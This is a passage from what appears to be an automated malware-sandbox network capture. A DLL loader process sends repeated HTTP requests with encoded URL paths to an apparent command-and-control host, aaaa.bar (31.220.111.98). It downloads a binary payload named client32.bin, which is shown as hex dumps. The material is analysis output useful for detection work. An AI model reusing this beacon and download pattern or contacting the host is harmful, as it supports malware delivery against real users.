                                                              2021-10-20 13:08:42 UTC10INData Raw: 73 29 7c 6d 6d 65 66 7c 6d 6f 28 30 31 7c 30 32 7c 62 69 7c 64 65 7c 64 6f 7c 74 28 5c 2d 7c 20 7c 6f 7c 76 29 7c 7a 7a 29 7c 6d 74 28 35 30 7c 70 31 7c 76 20 29 7c 6d 77 62 70 7c 6d 79 77 61 7c 6e 31 30 5b 30 2d 32 5d 7c 6e 32 30 5b 32 2d 33 5d 7c 6e 33 30 28 30 7c 32 29 7c 6e 35 30 28 30 7c 32 7c 35 29 7c 6e 37 28 30 28 30 7c 31 29 7c 31 30 29 7c 6e 65 28 28 63 7c 6d 29 5c 2d 7c 6f 6e 7c 74 66 7c 77 66 7c 77 67 7c 77 74 29 7c 6e 6f 6b 28 36 7c 69 29 7c 6e 7a 70 68 7c 6f 32 69 6d 7c 6f 70 28 74 69 7c 77 76 29 7c 6f 72 61 6e 7c 6f 77 67 31 7c 70 38 30 30 7c 70 61 6e 28 61 7c 64 7c 74 29 7c 70 64 78 67 7c 70 67 28 31 33 7c 5c 2d 28 5b 31 2d 38 5d 7c 63 29 29 7c 70 68 69 6c 7c 70 69 72 65 7c 70 6c 28 61 79 7c 75 63 29 7c 70 6e 5c 2d 32 7c 70 6f 28 63 6b 7c
                                                              Data Ascii: s)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|
                                                              2021-10-20 13:08:42 UTC11INData Raw: 72 6e 5b 32 5d 7d 7d 29 7d 29 7d 28 29 7d 63 61 74 63 68 28 65 29 7b 7d 7d 28 29 3b 0a
                                                              Data Ascii: rn[2]}})})}()}catch(e){}}();


                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                              10192.168.2.54995231.220.111.98443C:\Windows\System32\loaddll32.exe
                                                              TimestampkBytes transferredDirectionData
                                                              2021-10-20 13:12:02 UTC113OUTGET /jdraw/v6MBuMp_2/FbQ1ciPPyCG2FcgWXCEw/4p6JWEqOHqaqqmtUZlW/iZ4hp74waYQa3SoGGuOho1/ovuxQrp7KsWgS/wBggvPBS/iWInt5CFnJyvSqpyHgJyYxn/O_2F_2BUYe/fLDTk5RpDf_2F9mZ_/2F7NAIxeGgZa/QcsaY21TZZx/U7QIv9qlBRWqpg/DR61HU_2FzqgxKP2wonEs/EkSZK.crw HTTP/1.1
                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                                              Host: aaaa.bar
                                                              Connection: Keep-Alive
                                                              Cache-Control: no-cache
                                                              2021-10-20 13:12:03 UTC114INHTTP/1.1 200 OK
                                                              Server: nginx/1.10.3 (Ubuntu)
                                                              Date: Wed, 20 Oct 2021 13:12:02 GMT
                                                              Content-Type: application/zip
                                                              Content-Length: 178758
                                                              Connection: close
                                                              X-Powered-By: PHP/5.4.16
                                                              Set-Cookie: PHPSESSID=al703vnk3gvkbspp3p283jhcg4; path=/; domain=.aaaa.bar
                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                              Cache-Control: public
                                                              Pragma: no-cache
                                                              Set-Cookie: lang=en; expires=Fri, 19-Nov-2021 13:12:03 GMT; path=/; domain=.aaaa.bar
                                                              Content-Transfer-Encoding: Binary
                                                              Content-Disposition: attachment; filename=client32.bin
                                                              2021-10-20 13:12:03 UTC115INData Raw: 48 09 14 d8 bf b2 ec 04 c8 3f fb 4a d3 80 06 f0 bd 59 db e6 a5 dc 23 c3 c4 68 50 2b c5 72 6b 51 b9 b6 5d f6 b0 8c e5 6c 92 cd 4f eb 84 b9 2a 59 c3 36 e1 e6 ff 74 17 e2 17 9f 76 48 e1 10 c3 10 20 de 74 a3 61 05 3d 18 af ac d1 94 a7 dc dc 5f f5 ba 05 9e 73 7e 12 fb c3 d6 e6 b3 38 19 98 c6 03 29 3f e2 e7 9e 10 4f f5 6c 76 05 ad a2 46 50 82 ef cd d6 8c 0e b7 d4 7a 83 0b da 2d 3f 56 17 a1 34 c0 54 e5 30 ea 5b 21 4d d8 8f 21 be 07 db 0b 89 d7 cf 77 3b 02 38 71 1c 1f 9b 78 8e 6f 9b b0 e6 1c 94 9b b3 54 21 79 3e 7e 33 82 21 be 10 b5 61 81 24 d9 8a 08 f5 e7 50 bd 70 de 91 53 e6 73 d6 c6 19 5e 05 39 ca aa 07 24 5b aa 6c 8c 1d 89 d8 40 d1 82 e6 df 9e 85 6d c2 2a f3 5b 6b a5 60 05 cd cf 4f 2c bf c1 14 5d d9 66 4e 14 99 c2 6a 73 24 a6 b0 d9 6e 5b 0c a9 73 a8 5e db 86
                                                              Data Ascii: H?JY#hP+rkQ]lO*Y6tvH ta=_s~8)?OlvFPz-?V4T0[!M!w;8qxoT!y>~3!a$PpSs^9$[l@m*[k`O,]fNjs$n[s^
                                                              2021-10-20 13:12:03 UTC146INData Raw: 2f cd 4e e2 6d 3d b3 6d 18 6d b2 a4 52 9a 26 35 ce 65 b9 6f 85 b3 63 50 5a d2 f0 a8 20 62 9e a5 7a 86 87 fa a6 29 11 07 45 0d 42 b6 a4 07 73 ff c1 af 02 c1 71 9c 22 bd ed c1 9d 20 12 68 45 94 0e 31 66 ed c4 4f ee 1d 8d 97 64 a5 6b 76 95 72 e7 fc bb 76 38 22 9d 93 c7 ee a4 f6 76 97 81 b0 53 2e b9 4a d2 2e 0e d1 f0 42 c8 99 45 c3 4f 1b 82 3a 6c 44 b1 d0 4e 60 68 0f ca aa 59 27 0d 82 44 0f 0e d8 6c a5 f2 5a 2b 34 51 0c 9e c0 fe 2b 71 00 27 20 0e 37 af 8d a3 95 5f 9b 29 c9 d8 35 b8 2a 66 d5 20 3a 90 9c 22 7b b6 ab 88 6e 32 bd 60 33 05 b1 67 f0 a8 e4 ca 6d 9d 0e db 05 ea 8c cc aa 2a b6 75 21 e3 ac 76 51 cd be e0 2d d9 17 8b f7 c2 2d a6 66 e0 ad f0 fe d4 f9 06 9d 93 f2 9f e0 ab 3b 40 70 f7 be 38 ab b5 b6 ee f6 ee 83 bf 4c 8e d3 35 32 fd e9 f1 8d 4d ac 91 22 ad
                                                              Data Ascii: /Nm=mmR&5eocPZ bz)EBsq" hE1fOdkvrv8"vS.J.BEO:lDN`hY'DlZ+4Q+q' 7_)5*f :"{n2`3gm*u!vQ--f;@p8L52M"
                                                              2021-10-20 13:12:03 UTC162INData Raw: 6c a4 51 4a fc 7b bd 7f d9 f1 6b fc ec fb 6e 90 d2 79 58 19 81 5e 45 bc fc 54 04 a7 aa 6e 06 bf 25 c5 ef 09 12 4a f3 bb 53 2d be 21 39 1a 89 89 0f 91 39 7c 77 36 df 8c 02 73 e8 43 9a fb 3e f4 0a ab 75 20 cc ad 03 ca 76 2b 3e 1c 6d 95 d3 58 e2 96 a2 0d 81 ce 3e b5 30 97 fa 16 ce dc da ed f8 bb 1c b3 d7 33 42 62 26 04 50 c9 ae a2 8a d7 0c bd 59 fa 3d b7 94 9e e8 25 4b 9b 40 be 76 e8 3a ad 03 7f 12 a2 78 80 35 36 16 85 39 d8 c9 f0 3c 10 35 d3 2b 07 8d 44 02 38 bc e6 85 7c e7 8b b7 25 8b 79 c8 7a ee ee 1b cc 72 06 c8 2a e0 17 a1 c7 c5 41 68 75 09 b1 c5 32 0b 5e 03 01 f6 3b cc 77 07 e5 6f 4d 51 1b 95 cb 1d 16 30 1a 06 c1 a5 cd 08 a1 b6 f6 26 4e ba f8 a2 49 2c 1c 43 76 d1 a5 c5 47 99 6e 05 bd a7 1e c6 e6 03 94 f4 ad be 58 f1 71 89 43 63 13 8a 1e 32 e4 a8 18 93
                                                              Data Ascii: lQJ{knyX^ETn%JS-!99|w6sC>u v+>mX>03Bb&PY=%K@v:x569<5+D8|%yzr*Ahu2^;woMQ0&NI,CvGnXqCc2
                                                              2021-10-20 13:12:04 UTC210INData Raw: 7e ea d5 61 40 ab fb af 71 2d 8f d2 47 3c 64 96 3c ba 94 64 3e 8e 22 cd e5 f0 9c a7 b2 f9 30 8d 3c 67 e0 7e a7 75 0e ec e4 96 cb 75 96 d2 1c bf 2a 64 ad 95 7b 4c 2c 24 26 4f 38 4d d1 2a 9f 01 f5 f5 6c 0d ac 63 08 34 e7 34 e2 99 b4 57 a9 1f 75 a7 ee aa 0a 3b 50 1e 0b ac 4a ce ee 01 c3 32 96 1b bd 04 f7 0a c8 3b 88 1e e6 d3 b0 de 5c b7 76 9f 20 66 82 13 55 7a 3e 5c cb 79 14 ab 5c fa 96 18 e5 67 d2 19 90 78 9f ee 30 8c f1 3f 2e d6 ec ba 9a 6b f8 da 05 d4 37 52 8b a3 0a 1a 19 05 0a e7 5a 88 00 8b 2a 36 08 41 f9 1b e9 97 d2 26 0c 97 de f7 ed c6 73 ab d5 8a 06 ef 27 be 0a 4e c3 0a e9 be 5a 6f ac a9 19 20 98 07 51 2b 13 07 36 be 09 b9 b7 41 1a 66 56 b6 b1 3a ac 8f cb 62 3b fa 4f 63 78 a8 29 6c 69 cf 83 6b a1 a1 d5 9f 98 f7 51 83 7c c3 25 cb 56 a3 1a ed 3c 71 bf
                                                              Data Ascii: ~a@q-G<d<d>"0<g~uu*d{L,$&O8M*lc44Wu;PJ2;\v fUz>\y\gx0?.k7RZ*6A&s'NZo Q+6AfV:b;Ocx)likQ|%V<q
                                                              2021-10-20 13:12:04 UTC242INData Raw: 07 bf c6 e9 1a 58 a9 33 df a8 90 c1 fd 9b 14 b6 42 49 0c 43 9b a1 5d 41 d4 93 8f 95 f2 5d 15 06 7a 88 d4 71 60 f0 d1 0d de 58 30 ad 70 50 bb dc 51 5c ef 92 cd 96 19 42 49 c5 a7 f8 64 5d 57 9e 9d b9 e0 35 96 3c 1f 93 d4 1d 79 3b be c9 b0 31 98 fd bc 80 3f d1 14 89 b0 b4 78 16 cb 9a d1 b4 2b 9a 06 d1 06 1a 64 a3 10 4c ce 3a 8a 60 7c 73 b2 8b 7e 79 af a2 dc d1 6f 54 60 79 9f f4 96 38 4f 3b 0d 9e 31 ea c1 4b 1a c1 40 09 64 af 88 bc 54 18 ff 22 1f c7 04 06 86 79 fb 40 18 e4 1a 1f 36 a5 9e 94 ba 5f b7 60 6a 56 6a 8d 1c a6 41 53 d8 ca c6 a4 5a aa 51 ab a7 27 00 4d e4 3b e8 81 18 ba ea 8e 7c 6e 65 4d a1 a0 1c 3f bf 81 27 c8 85 c0 08 e9 ee 06 c9 47 cd a4 58 3c 71 b2 83 94 31 1c 7f a7 b3 c7 68 34 ff 5e 29 23 a3 8c a1 21 90 5b 3d 77 c6 bb 48 39 f2 a4 c2 e2 4f 7c 9d
                                                              Data Ascii: X3BIC]A]zq`X0pPQ\BId]W5<y;1?x+dL:`|s~yoT`y8O;1K@dT"y@6_`jVjASZQ'M;|neM?'GX<q1h4^)#![=wH9O|
                                                              2021-10-20 13:12:04 UTC274INData Raw: 16 04 3b 3b 83 5a 48 f4 b6 a6 d4 fb 3d 29 fe c2 33 de e5 b2 33 c2 37 d4 e5 94 65 72 83 c2 84 59 e9 4d 55 cf c0 71 95 42 b2 09 27 57 70 1b 29 4a 9b 25 79 fa 14 f8 34 4a 28 af fd c0 0a 76 3d 2f dc cb 57 96 d3 ed df 8c 84 e8 1d c5 80 de f0 53 e0 08 96 90 2b fb b3 89 01 8c fe ba 6b 9a 67 71 00 b5 fc 2a 36 f6 da c3 1f 71 26 a8 a4 a7 99 49 ad 9f 98 07 72 49 d2 42 4f 4b 87 6e fc 54 5a d2 8f 20 8e fd 64 5e a3 fa e8 e8 a4 2e 96 44 4b 9f 5c e0 da 8c 65 de 38 cb 99 b5 c2 61 3c 10 58 fc 70 45 b9 22 4e b7 0c b7 aa 95 18 05 da 73 ba 96 45 67 6f 1f 8f 3f a4 c0 f4 27 8f 3c 74 87 ac 75 a4 60 40 a2 47 b6 95 62 ae 8a 02 b6 4f 82 4b ae e2 3e aa 89 2a 8a 73 f3 50 96 97 34 7c 13 4f 6e 83 a3 fc 70 a0 d7 d6 2c ab 65 52 59 08 89 4f 9a 41 3a 75 93 17 32 49 b9 4b ad 60 1e 6f c0 08
                                                              Data Ascii: ;;ZH=)337erYMUqB'Wp)J%y4J(v=/WS+kgq*6q&IrIBOKnTZ d^.DK\e8a<XpE"NsEgo?'<tu`@GbOK>*sP4|Onp,eRYOA:u2IK`o
                                                              2021-10-20 13:12:04 UTC290INData Raw: 35 08 b5 ae da 8f cc 59 9e dc 22 0e a6 4c b2 72 98 0f 6d 65 74 d3 7d 24 22 13 99 fa c1 82 4f e0 0f cd ac a1 0c eb 6a 9a fd 6f c4 6e 56 c0 81 06 61 a6 82 c8 ba a8 2b d8 91 e3 ac 40 bb 82 67 0b 30 78 21 a1 1a 83 c6 9e 61 35 1d 15 95 b2 cc 31 27 90 11 eb 10 f0 fa f6 33 1b b6 39 49 89 e2 64 a4 95 a1 ac b1 b1 0a 42 b2 10 f8 d8 01 53 9c f7 3c ad 2d 4c 84 3b 72 ce 23 df 17 cf 5e 3e cc b4 61 04 c5 52 ab a7 b2 2b 23 54 1d 1a 01 d4 36 2d 3d ae b0 1e 7b 7a ff 48 9c 28 cc da a6 c0 95 ae 62 af d0 74 b3 cb c6 21 de c0 d7 df bd 9a 7a 14 43 58 00 36 9a 60 23 b8 7c af 09 42 b2 a5 fa d6 c1 6d 92 75 e0 22 a8 96 df b7 e3 7d 27 07 b8 30 01 e4 79 d4 29 b4 86 db 90 69 34 61 8d e2 8c af 36 2d 33 64 ee a8 62 a9 96 05 7b 22 d8 8a 22 1e af 8b d8 6e 6f 6a c3 e8 88 e5 d1 12 3c 6b 99
                                                              Data Ascii: 5Y"Lrmet}$"OjonVa+@g0x!a51'39IdBS<-L;r#^>aR+#T6-={zH(bt!zCX6`#|Bmu"}'0y)i4a6-3db{""noj<k
                                                              2021-10-20 13:12:04 UTC338INData Raw: 98 db 44 22 04 5f f9 61 0b e8 96 dd f6 9f 56 71 ee 85 12 88 33 59 04 2c 7a 79 38 27 5a c9 0a 11 50 86 23 8c ea d2 51 47 b0 2d 2c 9d 92 bf 5a af 82 7d 80 1b 2a 2c cc 4a 09 c6 68 7a 3e f1 5b c9 86 1a e7 c7 75 36 f3 b8 3f e7 a1 99 40 41 1b dd ce ab 2f a1 86 f5 6d cb 2f 68 18 60 2d 77 7b 30 3e f7 16 cb 06 0d ed 04 7c 58 12 ba 32 5b 9c 9a 7f d7 f9 f0 4e 8c 00 db dd 67 2a 90 2f 32 dc 27 d5 61 ce ab bf d6 11 fb ef a4 b2 59 d5 28 f8 cc 9e 5b 36 91 89 3a c4 10 e4 8b 1a 17 a1 ed 0b 5c 99 35 16 ad ed 6f 90 d8 d7 f3 60 b0 68 74 65 75 fd 9e b5 f7 8d 71 5a c7 ed 4f 3e 44 aa de 1f a0 35 1b 8b 00 6b 03 a7 d8 ac 64 af 04 98 af 4a aa 76 d0 90 99 69 1b 71 f1 60 33 4d c3 20 1a b6 a7 46 bb bd 33 07 92 09 47 ae a6 bb 51 19 18 c4 dd e6 5c 04 cf f3 b4 72 34 23 5f 4c 52 b6 30 bd
                                                              Data Ascii: D"_aVq3Y,zy8'ZP#QG-,Z}*,Jhz>[u6?@A/m/h`-w{0>|X2[Ng*/2'aY([6:\5o`hteuqZO>D5kdJviq`3M F3GQ\r4#_LR0
                                                              2021-10-20 13:12:05 UTC354INData Raw: 4c 40 a9 e9 d9 86 bc c0 cd 43 e4 c7 90 ae 8c 19 ac c7 b3 87 5a 51 40 16 7e b8 b0 cc 21 e6 1b 61 46 ef b7 d1 8b 40 f4 fd e2 66 f5 bf 3e 2c 3e a6 4d 92 b5 80 e2 ff 3a 8b 94 a8 8e 69 37 6c 09 2d 6b 7e d6 96 59 40 13 e3 03 18 c6 0f 46 81 3c 73 8e 15 1c 6f 9e d2 53 62 ae a3 d9 7e 7d c3 98 68 9b fd 89 49 70 57 0e eb 52 29 d6 62 e9 f2 1d 7c d2 46 2f a4 96 33 f6 b6 b3 94 d7 30 63 04 db fb 60 4d 2c 82 18 01 17 89 2f 44 0e 4f 7f 5f b2 79 c7 f3 f9 88 ad 5e 15 d3 3f c9 fd 72 fd 77 87 17 60 75 f8 85 83 6b bc 96 51 7a 33 23 e7 bf aa f3 5c 3e cd f2 10 54 d0 c5 f8 aa 0d c9 05 d8 c3 6c ef 6a 00 de 77 81 77 d9 fa d9 93 71 85 14 dc f0 13 ff 87 f6 7f 1d 3c 3d 29 77 97 16 13 13 fa e5 8b e9 c9 c1 ad 5c 0d a5 b7 be 11 a6 85 a8 5b 1b d8 ae e7 85 ff e8 46 47 ed a1 40 b2 bc 1a 82
                                                              Data Ascii: L@CZQ@~!aF@f>,>M:i7l-k~Y@F<soSb~}hIpWR)b|F/30c`M,/DO_y^?rw`ukQz3#\>Tljwwq<=)w\[FG@
                                                              2021-10-20 13:12:05 UTC402INData Raw: fd ae 3e f7 4c 93 cf c5 0c 59 24 59 c9 5d 94 03 66 9e b5 9a 5f 75 2c af 4e ed 4e 44 0d 00 13 2f fe 0e a8 2f ad 23 02 4a 09 d2 90 ad 0f 28 f1 74 3f 9e d9 e5 03 cc 5c 7d 96 be 8b 3a e7 81 2a d0 28 82 9e 72 47 49 ae 68 ab 7e 2b 8c 76 2f ff b3 c4 9b e4 b2 c1 06 5b a1 00 c6 64 27 d0 af 5b e1 4c ed c1 71 6f 5b f5 7b 94 53 8c e5 92 1e b4 2f 7d 8d c5 5a e6 ac 0b 6e f5 0d 40 99 f2 a5 d4 40 d4 71 e9 23 2c 40 bb 6f eb 96 73 0e f9 51 c8 63 9d 33 49 0c 31 7e 88 5c 3e 3c 15 f7 97 48 32 f8 2b e6 fb 88 1a e0 38 e7 13 58 63 9d e7 80 c5 f0 3e ba 91 42 0d 7f cd e9 0d ca e3 e1 81 57 f5 94 7b 71 2f 6d 7c b4 2a f7 6e 85 74 50 94 a5 43 c7 77 00 5e b4 6a c4 a9 37 d4 dc 5f b2 55 b9 d9 f4 e1 81 94 56 02 73 a8 36 b4 9e 4c 53 32 2c 31 20 01 8d c0 58 2a fc df b0 40 cf c3 6e e0 e3 b2
                                                              Data Ascii: >LY$Y]f_u,NND//#J(t?\}:*(rGIh~+v/[d'[Lqo[{S/}Zn@@q#,@osQc3I1~\><H2+8Xc>BW{q/m|*ntPCw^j7_UVs6LS2,1 X*@n
                                                              2021-10-20 13:12:05 UTC418INData Raw: 97 63 78 a6 a0 8e 1a 65 cb 1e 91 2f 22 bb 8a 31 e7 d9 74 a0 06 ab 80 1f 40 e6 3d b2 62 83 57 4a d6 78 d9 76 89 d7 13 5c 17 02 bf c9 86 0b d1 e4 e2 5d c8 32 0f 93 f0 2b c9 3a ef 87 36 a6 3c 40 f3 07 57 c4 30 ac d5 34 fa 5d d1 68 43 c4 2e bf 37 51 69 56 37 74 e2 dd d8 1c c8 ef 82 c0 af 65 b2 ce cf 9b cd 9b 52 a1 f8 80 fe e4 7d a5 36 12 88 cc 61 8a 33 bd 39 e6 58 9f 50 01 1c 4d 01 b4 eb 19 a5 a3 ec 06 45 14 c2 d5 47 4e f9 a8 14 fc a6 64 43 36 fb 29 34 85 de d6 b9 f8 bc 81 aa ee fb 1e e6 d0 7e 0c 8e 4e b9 31 0c 12 af e9 e6 fd 22 d2 c6 50 16 a6 02 1d 7a f6 2b d3 46 07 4f e6 73 ed 53 38 c2 58 45 28 58 3a b1 f6 c3 18 df 96 8a 6f 7e ff 15 c1 12 a6 b6 ac 7f c1 0f ac 94 31 88 b8 1f 5f 74 d9 63 e1 94 11 49 c3 dd 20 d2 c4 78 26 12 f1 60 73 6d 29 bf 09 38 72 79 07 13
                                                              Data Ascii: cxe/"1t@=bWJxv\]2+:6<@W04]hC.7QiV7teR}6a39XPMEGNdC6)4~N1"Pz+FOsS8XE(X:o~1_tcI x&`sm)8ry


                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                              11192.168.2.54995431.220.111.98443C:\Windows\System32\loaddll32.exe
                                                              TimestampkBytes transferredDirectionData
                                                              2021-10-20 13:12:02 UTC114OUTGET /jdraw/5EykzOMH8AC5xhH2f/h8YTRIF2mRSj/KI86vZ_2Fir/d_2FuekCCAOUjf/zFWcX3e13Ac_2BX_2BJGA/HUhc5yQiyPXedVM9/FyaB9AafT7f6pn1/rx17UyN0GmK2igoXTb/2p_2Bsvx3/fo8we1bgw6ZsfyAC6K72/DEX9YIVMXwvcSkZsNZR/8w9U8utAyGo407eExfiyfi/bLDkUZuz9hmdJ/XGInYyFxli4cy/JoKC.crw HTTP/1.1
                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                                              Host: aaaa.bar
                                                              Connection: Keep-Alive
                                                              Cache-Control: no-cache
                                                              2021-10-20 13:12:03 UTC130INHTTP/1.1 200 OK
                                                              Server: nginx/1.10.3 (Ubuntu)
                                                              Date: Wed, 20 Oct 2021 13:12:02 GMT
                                                              Content-Type: application/zip
                                                              Content-Length: 178758
                                                              Connection: close
                                                              X-Powered-By: PHP/5.4.16
                                                              Set-Cookie: PHPSESSID=lsnqfh754hfkcfkt83tqpqmdf3; path=/; domain=.aaaa.bar
                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                              Cache-Control: public
                                                              Pragma: no-cache
                                                              Set-Cookie: lang=en; expires=Fri, 19-Nov-2021 13:12:03 GMT; path=/; domain=.aaaa.bar
                                                              Content-Transfer-Encoding: Binary
                                                              Content-Disposition: attachment; filename=client32.bin
                                                              2021-10-20 13:12:03 UTC131INData Raw: 48 09 14 d8 bf b2 ec 04 c8 3f fb 4a d3 80 06 f0 bd 59 db e6 a5 dc 23 c3 c4 68 50 2b c5 72 6b 51 b9 b6 5d f6 b0 8c e5 6c 92 cd 4f eb 84 b9 2a 59 c3 36 e1 e6 ff 74 17 e2 17 9f 76 48 e1 10 c3 10 20 de 74 a3 61 05 3d 18 af ac d1 94 a7 dc dc 5f f5 ba 05 9e 73 7e 12 fb c3 d6 e6 b3 38 19 98 c6 03 29 3f e2 e7 9e 10 4f f5 6c 76 05 ad a2 46 50 82 ef cd d6 8c 0e b7 d4 7a 83 0b da 2d 3f 56 17 a1 34 c0 54 e5 30 ea 5b 21 4d d8 8f 21 be 07 db 0b 89 d7 cf 77 3b 02 38 71 1c 1f 9b 78 8e 6f 9b b0 e6 1c 94 9b b3 54 21 79 3e 7e 33 82 21 be 10 b5 61 81 24 d9 8a 08 f5 e7 50 bd 70 de 91 53 e6 73 d6 c6 19 5e 05 39 ca aa 07 24 5b aa 6c 8c 1d 89 d8 40 d1 82 e6 df 9e 85 6d c2 2a f3 5b 6b a5 60 05 cd cf 4f 2c bf c1 14 5d d9 66 4e 14 99 c2 6a 73 24 a6 b0 d9 6e 5b 0c a9 73 a8 5e db 86
                                                              Data Ascii: H?JY#hP+rkQ]lO*Y6tvH ta=_s~8)?OlvFPz-?V4T0[!M!w;8qxoT!y>~3!a$PpSs^9$[l@m*[k`O,]fNjs$n[s^
                                                              2021-10-20 13:12:03 UTC178INData Raw: 2f cd 4e e2 6d 3d b3 6d 18 6d b2 a4 52 9a 26 35 ce 65 b9 6f 85 b3 63 50 5a d2 f0 a8 20 62 9e a5 7a 86 87 fa a6 29 11 07 45 0d 42 b6 a4 07 73 ff c1 af 02 c1 71 9c 22 bd ed c1 9d 20 12 68 45 94 0e 31 66 ed c4 4f ee 1d 8d 97 64 a5 6b 76 95 72 e7 fc bb 76 38 22 9d 93 c7 ee a4 f6 76 97 81 b0 53 2e b9 4a d2 2e 0e d1 f0 42 c8 99 45 c3 4f 1b 82 3a 6c 44 b1 d0 4e 60 68 0f ca aa 59 27 0d 82 44 0f 0e d8 6c a5 f2 5a 2b 34 51 0c 9e c0 fe 2b 71 00 27 20 0e 37 af 8d a3 95 5f 9b 29 c9 d8 35 b8 2a 66 d5 20 3a 90 9c 22 7b b6 ab 88 6e 32 bd 60 33 05 b1 67 f0 a8 e4 ca 6d 9d 0e db 05 ea 8c cc aa 2a b6 75 21 e3 ac 76 51 cd be e0 2d d9 17 8b f7 c2 2d a6 66 e0 ad f0 fe d4 f9 06 9d 93 f2 9f e0 ab 3b 40 70 f7 be 38 ab b5 b6 ee f6 ee 83 bf 4c 8e d3 35 32 fd e9 f1 8d 4d ac 91 22 ad
                                                              Data Ascii: /Nm=mmR&5eocPZ bz)EBsq" hE1fOdkvrv8"vS.J.BEO:lDN`hY'DlZ+4Q+q' 7_)5*f :"{n2`3gm*u!vQ--f;@p8L52M"
                                                              2021-10-20 13:12:03 UTC194INData Raw: 6c a4 51 4a fc 7b bd 7f d9 f1 6b fc ec fb 6e 90 d2 79 58 19 81 5e 45 bc fc 54 04 a7 aa 6e 06 bf 25 c5 ef 09 12 4a f3 bb 53 2d be 21 39 1a 89 89 0f 91 39 7c 77 36 df 8c 02 73 e8 43 9a fb 3e f4 0a ab 75 20 cc ad 03 ca 76 2b 3e 1c 6d 95 d3 58 e2 96 a2 0d 81 ce 3e b5 30 97 fa 16 ce dc da ed f8 bb 1c b3 d7 33 42 62 26 04 50 c9 ae a2 8a d7 0c bd 59 fa 3d b7 94 9e e8 25 4b 9b 40 be 76 e8 3a ad 03 7f 12 a2 78 80 35 36 16 85 39 d8 c9 f0 3c 10 35 d3 2b 07 8d 44 02 38 bc e6 85 7c e7 8b b7 25 8b 79 c8 7a ee ee 1b cc 72 06 c8 2a e0 17 a1 c7 c5 41 68 75 09 b1 c5 32 0b 5e 03 01 f6 3b cc 77 07 e5 6f 4d 51 1b 95 cb 1d 16 30 1a 06 c1 a5 cd 08 a1 b6 f6 26 4e ba f8 a2 49 2c 1c 43 76 d1 a5 c5 47 99 6e 05 bd a7 1e c6 e6 03 94 f4 ad be 58 f1 71 89 43 63 13 8a 1e 32 e4 a8 18 93
                                                              Data Ascii: lQJ{knyX^ETn%JS-!99|w6sC>u v+>mX>03Bb&PY=%K@v:x569<5+D8|%yzr*Ahu2^;woMQ0&NI,CvGnXqCc2
                                                              2021-10-20 13:12:04 UTC226INData Raw: 7e ea d5 61 40 ab fb af 71 2d 8f d2 47 3c 64 96 3c ba 94 64 3e 8e 22 cd e5 f0 9c a7 b2 f9 30 8d 3c 67 e0 7e a7 75 0e ec e4 96 cb 75 96 d2 1c bf 2a 64 ad 95 7b 4c 2c 24 26 4f 38 4d d1 2a 9f 01 f5 f5 6c 0d ac 63 08 34 e7 34 e2 99 b4 57 a9 1f 75 a7 ee aa 0a 3b 50 1e 0b ac 4a ce ee 01 c3 32 96 1b bd 04 f7 0a c8 3b 88 1e e6 d3 b0 de 5c b7 76 9f 20 66 82 13 55 7a 3e 5c cb 79 14 ab 5c fa 96 18 e5 67 d2 19 90 78 9f ee 30 8c f1 3f 2e d6 ec ba 9a 6b f8 da 05 d4 37 52 8b a3 0a 1a 19 05 0a e7 5a 88 00 8b 2a 36 08 41 f9 1b e9 97 d2 26 0c 97 de f7 ed c6 73 ab d5 8a 06 ef 27 be 0a 4e c3 0a e9 be 5a 6f ac a9 19 20 98 07 51 2b 13 07 36 be 09 b9 b7 41 1a 66 56 b6 b1 3a ac 8f cb 62 3b fa 4f 63 78 a8 29 6c 69 cf 83 6b a1 a1 d5 9f 98 f7 51 83 7c c3 25 cb 56 a3 1a ed 3c 71 bf
                                                              Data Ascii: ~a@q-G<d<d>"0<g~uu*d{L,$&O8M*lc44Wu;PJ2;\v fUz>\y\gx0?.k7RZ*6A&s'NZo Q+6AfV:b;Ocx)likQ|%V<q
                                                              2021-10-20 13:12:04 UTC258INData Raw: 07 bf c6 e9 1a 58 a9 33 df a8 90 c1 fd 9b 14 b6 42 49 0c 43 9b a1 5d 41 d4 93 8f 95 f2 5d 15 06 7a 88 d4 71 60 f0 d1 0d de 58 30 ad 70 50 bb dc 51 5c ef 92 cd 96 19 42 49 c5 a7 f8 64 5d 57 9e 9d b9 e0 35 96 3c 1f 93 d4 1d 79 3b be c9 b0 31 98 fd bc 80 3f d1 14 89 b0 b4 78 16 cb 9a d1 b4 2b 9a 06 d1 06 1a 64 a3 10 4c ce 3a 8a 60 7c 73 b2 8b 7e 79 af a2 dc d1 6f 54 60 79 9f f4 96 38 4f 3b 0d 9e 31 ea c1 4b 1a c1 40 09 64 af 88 bc 54 18 ff 22 1f c7 04 06 86 79 fb 40 18 e4 1a 1f 36 a5 9e 94 ba 5f b7 60 6a 56 6a 8d 1c a6 41 53 d8 ca c6 a4 5a aa 51 ab a7 27 00 4d e4 3b e8 81 18 ba ea 8e 7c 6e 65 4d a1 a0 1c 3f bf 81 27 c8 85 c0 08 e9 ee 06 c9 47 cd a4 58 3c 71 b2 83 94 31 1c 7f a7 b3 c7 68 34 ff 5e 29 23 a3 8c a1 21 90 5b 3d 77 c6 bb 48 39 f2 a4 c2 e2 4f 7c 9d
                                                              Data Ascii: X3BIC]A]zq`X0pPQ\BId]W5<y;1?x+dL:`|s~yoT`y8O;1K@dT"y@6_`jVjASZQ'M;|neM?'GX<q1h4^)#![=wH9O|
